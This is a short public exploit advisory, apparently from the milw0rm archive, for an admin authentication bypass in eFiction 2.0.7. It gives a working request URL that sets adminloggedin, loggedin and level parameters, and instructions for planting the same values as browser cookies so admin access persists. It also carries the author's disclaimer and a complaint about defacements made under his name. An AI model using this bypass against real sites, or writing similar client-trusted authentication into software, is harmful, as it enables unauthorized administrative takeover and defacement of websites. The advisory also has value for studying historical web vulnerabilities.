1 ##########################################
2 # eFiction vulnerability
3 ##########################################
4 # I am releasing this to the public. Vendor was notified. Someone is also illegally defacing
5 these websites under MY name, which is a shame because they ripped it from a private discussion
6 on g00ns.net. This proof of concept is not to be used to illegally hack websites. I do not condone,
7 nor act in this type of activity. I suggest whomever is defacing websites under my name stop,
8 since you would gain more notorioty under your own name.
9 ##########################################
10
11 http://[target].com/efiction/index.php?adminloggedin=1&loggedin=1&level=1
12
13 Use firefox’s extension "add n edit cookies" to add these to your cookies so they stick.
14 (ie: instead of $_GET[’loggedin’] its $_COOKIE[’loggedin’] which stays with each page)
15
16 # milw0rm.com [2006−08−25]
Page 1/1
eFiction 2.0.7 Remote Admin Authentication Bypass Vulnerability
Vipsta
08/25/2006